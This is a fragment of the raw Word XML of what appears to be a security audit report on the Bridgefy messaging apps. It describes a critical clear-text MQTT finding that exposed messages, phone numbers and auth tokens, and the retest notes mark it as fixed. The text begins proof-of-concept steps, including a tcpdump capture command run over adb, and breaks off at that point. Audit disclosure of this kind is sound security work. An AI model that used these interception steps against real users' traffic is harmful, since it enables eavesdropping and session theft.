        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Warnings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>clear-text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="980000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>valid.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>staging</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>3.0.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(1001)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and iOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>build</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>274</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>mitigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Android and iOS apps communicate with the backend MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>broker over clear-text MQTT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. This allows malicious Man-In-The-Middle (MitM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>attackers, able to intercept clear-text communications (i.e. via open Wi-Fi without guest isolation, ISP MitM, BGP hijacking, etc.), to read and modify all information transmitted over this insecure channel. Information observed during this assignment includes messages sent from one user to another,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>phone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>numbers,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>usernames,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>user authentication tokens.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>note</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>demonstrated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>could additionally use the obtained MQTT credentials to subscribe to topics and publish messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>behalf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>MitM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>trivially</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>simulated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>against the Android app as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="377" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Close the Android application and the Bridgefy service (from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Notifications </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Stop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bridgefy)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>capturing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>capture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>traffic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Android</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>device.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>adb shell tcpdump port 8083 -w </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/data/local/tmp/mqtt.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487590912">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193087</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="17" name="Graphic 17"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
